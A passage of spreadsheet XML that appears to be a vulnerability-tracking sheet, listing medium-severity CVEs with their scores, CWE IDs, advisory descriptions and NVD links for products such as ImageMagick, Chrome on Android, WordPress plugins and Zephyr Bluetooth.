          <t>A security flaw has been discovered in sfturing hosp_order up to 627f426331da8086ce8fff2017d65b1ddef384f8. The affected element is the function modifyPassWord of the file ssm_pro/src/main/java/cn/sfturing/web/CommonUserController.java of the component Password Recovery. Performing a manipulation results in unverified password change. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S904" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86260</t>
        </is>
      </c>
    </row>
    <row r="905">
      <c r="A905" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B905" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C905" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86276</t>
        </is>
      </c>
      <c r="D905" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E905" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F905" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G905" s="5" t="inlineStr"/>
      <c r="H905" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I905" s="5" t="inlineStr"/>
      <c r="J905" s="5" t="inlineStr"/>
      <c r="K905" s="5" t="inlineStr"/>
      <c r="L905" s="5" t="inlineStr"/>
      <c r="M905" s="5" t="inlineStr"/>
      <c r="N905" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O905" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P905" s="5" t="inlineStr"/>
      <c r="Q905" s="5" t="inlineStr">
        <is>
          <t>CWE-259, CWE-798</t>
        </is>
      </c>
      <c r="R905" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in SourceCodester Syllabus-Aligned Learning Management &amp; Examination System 1.0. This issue affects some unknown processing of the file db.php. Executing a manipulation can lead to hard-coded credentials. The attack can be executed remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="S905" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86276</t>
        </is>
      </c>
    </row>
    <row r="906">
      <c r="A906" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B906" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C906" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86292</t>
        </is>
      </c>
      <c r="D906" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E906" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F906" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G906" s="5" t="inlineStr"/>
      <c r="H906" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I906" s="5" t="inlineStr"/>
      <c r="J906" s="5" t="inlineStr"/>
      <c r="K906" s="5" t="inlineStr"/>
      <c r="L906" s="5" t="inlineStr"/>
      <c r="M906" s="5" t="inlineStr"/>
      <c r="N906" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O906" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P906" s="5" t="inlineStr"/>
      <c r="Q906" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="R906" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in SourceCodester Simple Traffic Offense System 1.0. Affected is an unknown function of the file saveuser.php of the component User Creation. Performing a manipulation of the argument position results in missing authentication. The attack may be initiated remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="S906" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86292</t>
        </is>
      </c>
    </row>
    <row r="907">
      <c r="A907" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B907" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C907" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86302</t>
        </is>
      </c>
      <c r="D907" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E907" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F907" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G907" s="5" t="inlineStr"/>
      <c r="H907" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I907" s="5" t="inlineStr"/>
      <c r="J907" s="5" t="inlineStr"/>
      <c r="K907" s="5" t="inlineStr"/>
      <c r="L907" s="5" t="inlineStr"/>
      <c r="M907" s="5" t="inlineStr"/>
      <c r="N907" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O907" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P907" s="5" t="inlineStr"/>
      <c r="Q907" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="R907" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in code-projects Hospital Information System 1.0. Affected by this vulnerability is an unknown functionality of the file /HIS/his.sql of the component SQL Database Backup File Handler. Performing a manipulation results in information disclosure. Remote exploitation of the attack is possible. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="S907" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86302</t>
        </is>
      </c>
    </row>
    <row r="908">
      <c r="A908" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B908" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C908" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86308</t>
        </is>
      </c>
      <c r="D908" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E908" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F908" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G908" s="5" t="inlineStr"/>
      <c r="H908" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I908" s="5" t="inlineStr"/>
      <c r="J908" s="5" t="inlineStr"/>
      <c r="K908" s="5" t="inlineStr"/>
      <c r="L908" s="5" t="inlineStr"/>
      <c r="M908" s="5" t="inlineStr"/>
      <c r="N908" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O908" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P908" s="5" t="inlineStr"/>
      <c r="Q908" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="R908" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in light0011 cms c774dce31c6df0055568a8d5c53d964d99be199d/f72cf46f601efb2a0618c3814cc2f61380b38930. This issue affects some unknown processing of the file App/Common/Conf/config.php of the component Debug Mode. The manipulation of the argument DB_DEBUG results in information disclosure. It is possible to launch the attack remotely. The exploit is now public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S908" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86308</t>
        </is>
      </c>
    </row>
    <row r="909">
      <c r="A909" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B909" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86319</t>
        </is>
      </c>
      <c r="D909" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E909" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F909" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G909" s="5" t="inlineStr"/>
      <c r="H909" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I909" s="5" t="inlineStr"/>
      <c r="J909" s="5" t="inlineStr"/>
      <c r="K909" s="5" t="inlineStr"/>
      <c r="L909" s="5" t="inlineStr"/>
      <c r="M909" s="5" t="inlineStr"/>
      <c r="N909" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O909" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P909" s="5" t="inlineStr"/>
      <c r="Q909" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-404</t>
        </is>
      </c>
      <c r="R909" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in java-json-tools json-patch up to 1.13. Affected by this vulnerability is the function JsonPatch.apply of the file src/main/java/com/github/fge/jsonpatch/JsonPatch.java of the component Patch Operation Handler. The manipulation leads to resource consumption. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S909" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86319</t>
        </is>
      </c>
    </row>
    <row r="910">
      <c r="A910" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B910" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86423</t>
        </is>
      </c>
      <c r="D910" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E910" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F910" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G910" s="5" t="inlineStr"/>
      <c r="H910" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I910" s="5" t="inlineStr"/>
      <c r="J910" s="5" t="inlineStr"/>
      <c r="K910" s="5" t="inlineStr">
        <is>
          <t>imagemagick:imagemagick</t>
        </is>
      </c>
      <c r="L910" s="5" t="inlineStr"/>
      <c r="M910" s="5" t="inlineStr"/>
      <c r="N910" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O910" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P910" s="5" t="inlineStr"/>
      <c r="Q910" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R910" s="5" t="inlineStr">
        <is>
          <t>ImageMagick before 7.1.2-30 and 6.9.x before 6.9.13-55 contains a heap-use-after-free vulnerability in the GetList method of PerlMagick. A crafted call to the GetList method can trigger the use-after-free, resulting in a crash (denial of service).</t>
        </is>
      </c>
      <c r="S910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86423</t>
        </is>
      </c>
    </row>
    <row r="911">
      <c r="A911" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B911" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86425</t>
        </is>
      </c>
      <c r="D911" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E911" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F911" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G911" s="5" t="inlineStr"/>
      <c r="H911" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I911" s="5" t="inlineStr"/>
      <c r="J911" s="5" t="inlineStr"/>
      <c r="K911" s="5" t="inlineStr">
        <is>
          <t>imagemagick:imagemagick</t>
        </is>
      </c>
      <c r="L911" s="5" t="inlineStr"/>
      <c r="M911" s="5" t="inlineStr"/>
      <c r="N911" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O911" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P911" s="5" t="inlineStr"/>
      <c r="Q911" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R911" s="5" t="inlineStr">
        <is>
          <t>ImageMagick before 7.1.2-30 and 6.9.x before 6.9.13-55 contains a heap-use-after-free vulnerability in the Layer method of PerlMagick. An attacker who supplies a crafted list of images can trigger memory access after deallocation, resulting in a crash (denial of service).</t>
        </is>
      </c>
      <c r="S911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86425</t>
        </is>
      </c>
    </row>
    <row r="912">
      <c r="A912" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B912" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87552</t>
        </is>
      </c>
      <c r="D912" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E912" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F912" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G912" s="5" t="inlineStr"/>
      <c r="H912" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I912" s="5" t="inlineStr"/>
      <c r="J912" s="5" t="inlineStr"/>
      <c r="K912" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L912" s="5" t="inlineStr"/>
      <c r="M912" s="5" t="inlineStr"/>
      <c r="N912" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O912" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P912" s="5" t="inlineStr"/>
      <c r="Q912" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R912" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in TrustedWebActivities in Google Chrome on on Android prior to 153.0.8010.36 allowed a local attacker to obtain sensitive information via a co-installed app. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S912" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87552</t>
        </is>
      </c>
    </row>
    <row r="913">
      <c r="A913" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B913" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87921</t>
        </is>
      </c>
      <c r="D913" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E913" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F913" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G913" s="5" t="inlineStr"/>
      <c r="H913" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I913" s="5" t="inlineStr"/>
      <c r="J913" s="5" t="inlineStr"/>
      <c r="K913" s="5" t="inlineStr"/>
      <c r="L913" s="5" t="inlineStr"/>
      <c r="M913" s="5" t="inlineStr"/>
      <c r="N913" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O913" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P913" s="5" t="inlineStr"/>
      <c r="Q913" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R913" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Rizwan17 inventory-management-system up to bfe78a330d01bb26b9daec5dc9ecd5c77900e03f. Affected is the function update_record of the file includes/manage.php. The manipulation of the argument update_category/cid/update_brand/update_product leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S913" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87921</t>
        </is>
      </c>
    </row>
    <row r="914">
      <c r="A914" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B914" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87922</t>
        </is>
      </c>
      <c r="D914" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E914" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F914" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G914" s="5" t="inlineStr"/>
      <c r="H914" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I914" s="5" t="inlineStr"/>
      <c r="J914" s="5" t="inlineStr"/>
      <c r="K914" s="5" t="inlineStr"/>
      <c r="L914" s="5" t="inlineStr"/>
      <c r="M914" s="5" t="inlineStr"/>
      <c r="N914" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O914" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P914" s="5" t="inlineStr"/>
      <c r="Q914" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="R914" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Rizwan17 inventory-management-system up to bfe78a330d01bb26b9daec5dc9ecd5c77900e03f. Affected by this vulnerability is the function DBOperation.addCategory of the file includes/process.php of the component AJAX Backend. The manipulation of the argument userid results in missing authentication. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S914" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87922</t>
        </is>
      </c>
    </row>
    <row r="915">
      <c r="A915" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B915" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87924</t>
        </is>
      </c>
      <c r="D915" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E915" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F915" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G915" s="5" t="inlineStr"/>
      <c r="H915" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I915" s="5" t="inlineStr"/>
      <c r="J915" s="5" t="inlineStr"/>
      <c r="K915" s="5" t="inlineStr"/>
      <c r="L915" s="5" t="inlineStr"/>
      <c r="M915" s="5" t="inlineStr"/>
      <c r="N915" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O915" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P915" s="5" t="inlineStr"/>
      <c r="Q915" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="R915" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in Rizwan17 inventory-management-system up to bfe78a330d01bb26b9daec5dc9ecd5c77900e03f. This affects an unknown part of the file includes/invoice_bill.php of the component Invoice Generation. Such manipulation of the argument order_date/invoice_no leads to missing authentication. It is possible to launch the attack remotely. The exploit has been disclosed publicly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S915" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87924</t>
        </is>
      </c>
    </row>
    <row r="916">
      <c r="A916" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B916" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C916" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-26961</t>
        </is>
      </c>
      <c r="D916" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E916" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F916" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G916" s="5" t="inlineStr"/>
      <c r="H916" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I916" s="5" t="inlineStr"/>
      <c r="J916" s="5" t="inlineStr"/>
      <c r="K916" s="5" t="inlineStr"/>
      <c r="L916" s="5" t="inlineStr"/>
      <c r="M916" s="5" t="inlineStr"/>
      <c r="N916" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O916" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P916" s="5" t="inlineStr"/>
      <c r="Q916" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R916" s="5" t="inlineStr">
        <is>
          <t>Italtel NetMatch-S 5.0.0-20200703 allows Multiple Stored XSS under NP_IBCF-NATUP-01/NMSCI-WebGui/backup_restore.jsp and NP_IBCF-MIBER-03/NMSCI-WebGui/storage.jsp via the name parameter. A malicious user leveraging this vulnerability could inject arbitrary JavaScript. The malicious payload will then be triggered every time an authenticated user browses the page containing it.</t>
        </is>
      </c>
      <c r="S916" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-26961</t>
        </is>
      </c>
    </row>
    <row r="917">
      <c r="A917" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B917" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11821</t>
        </is>
      </c>
      <c r="D917" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E917" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F917" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G917" s="5" t="inlineStr"/>
      <c r="H917" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I917" s="5" t="inlineStr"/>
      <c r="J917" s="5" t="inlineStr"/>
      <c r="K917" s="5" t="inlineStr"/>
      <c r="L917" s="5" t="inlineStr"/>
      <c r="M917" s="5" t="inlineStr"/>
      <c r="N917" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O917" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P917" s="5" t="inlineStr"/>
      <c r="Q917" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R917" s="5" t="inlineStr">
        <is>
          <t>The Eventin – Event Calendar, Event Registration, Tickets &amp; Booking (AI Powered) plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.1.17. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to view, create, update, clone, and delete notification flow event automation workflows that should be restricted to administrators.</t>
        </is>
      </c>
      <c r="S917" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11821</t>
        </is>
      </c>
    </row>
    <row r="918">
      <c r="A918" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B918" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15460</t>
        </is>
      </c>
      <c r="D918" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E918" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F918" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G918" s="5" t="inlineStr"/>
      <c r="H918" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I918" s="5" t="inlineStr"/>
      <c r="J918" s="5" t="inlineStr"/>
      <c r="K918" s="5" t="inlineStr"/>
      <c r="L918" s="5" t="inlineStr"/>
      <c r="M918" s="5" t="inlineStr"/>
      <c r="N918" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O918" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P918" s="5" t="inlineStr"/>
      <c r="Q918" s="5" t="inlineStr">
        <is>
          <t>CWE-666</t>
        </is>
      </c>
      <c r="R918" s="5" t="inlineStr">
        <is>
          <t>The Bluetooth Classic (BR/EDR) L2CAP receive handler bt_l2cap_br_recv() in subsys/bluetooth/host/classic/l2cap_br.c dispatched inbound data PDUs based only on the destination channel ID, without checking that the target channel had reached the BT_L2CAP_CONNECTED state. A dynamic channel is assigned its RX CID and added to the connection's channel list while still in BT_L2CAP_CONNECTING (and later BT_L2CAP_CONFIG) — before configuration completes and, for PSMs that require security, before the peer is authenticated (l2cap_br_conn_req()).
Because the channel is already findable by bt_l2cap_br_lookup_rx_cid() during this window, a remote peer within radio range can send a data PDU addressed to that CID and have it processed on a not-yet-established channel. The dispatch keys off channel fields (BR_CHAN(chan)-&gt;rx.mode, rx.mps) that are only initialized during configuration by l2cap_br_conf(); since channel objects are pooled and bt_l2cap_br_chan_del() does not reset rx.mode or the reassembly buffer _sdu, a reused channel can carry stale state into the CONNECTING window and route the frame into the retransmission/flow-control path (bt_l2cap_br_ret_fc_recv()) with stale parameters and a possibly stale _sdu pointer.
The impact is delivery of attacker data to upper-layer protocol handlers on a half-open (and possibly unauthenticated) channel, plus operation on stale or partially initialized channel state on reused channel objects — leading to channel/link teardown (denial of service) and, in the stale-_sdu case, a dangling-pointer condition. The fix adds an explicit BR_CHAN(chan)-&gt;state &lt; BT_L2CAP_CONNECTED guard that drops any data received before the channel is fully connected.</t>
        </is>
      </c>
      <c r="S918" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15460</t>
        </is>
      </c>
    </row>
    <row r="919">
      <c r="A919" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B919" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17274</t>
        </is>
      </c>
      <c r="D919" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E919" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F919" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G919" s="5" t="inlineStr"/>
      <c r="H919" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I919" s="5" t="inlineStr"/>
      <c r="J919" s="5" t="inlineStr"/>
      <c r="K919" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="L919" s="5" t="inlineStr"/>
      <c r="M919" s="5" t="inlineStr"/>
      <c r="N919" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O919" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P919" s="5" t="inlineStr"/>
      <c r="Q919" s="5" t="inlineStr">
        <is>
          <t>CWE-330</t>
        </is>
      </c>
      <c r="R919" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to bypass security restrictions due to predictable server seeds.</t>
        </is>
      </c>
      <c r="S919" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17274</t>
        </is>
      </c>
    </row>
    <row r="920">
      <c r="A920" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B920" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38725</t>
        </is>
      </c>
      <c r="D920" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E920" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F920" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G920" s="5" t="inlineStr"/>
      <c r="H920" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I920" s="5" t="inlineStr"/>
      <c r="J920" s="5" t="inlineStr"/>
      <c r="K920" s="5" t="inlineStr"/>
      <c r="L920" s="5" t="inlineStr"/>
      <c r="M920" s="5" t="inlineStr"/>
      <c r="N920" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O920" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P920" s="5" t="inlineStr"/>
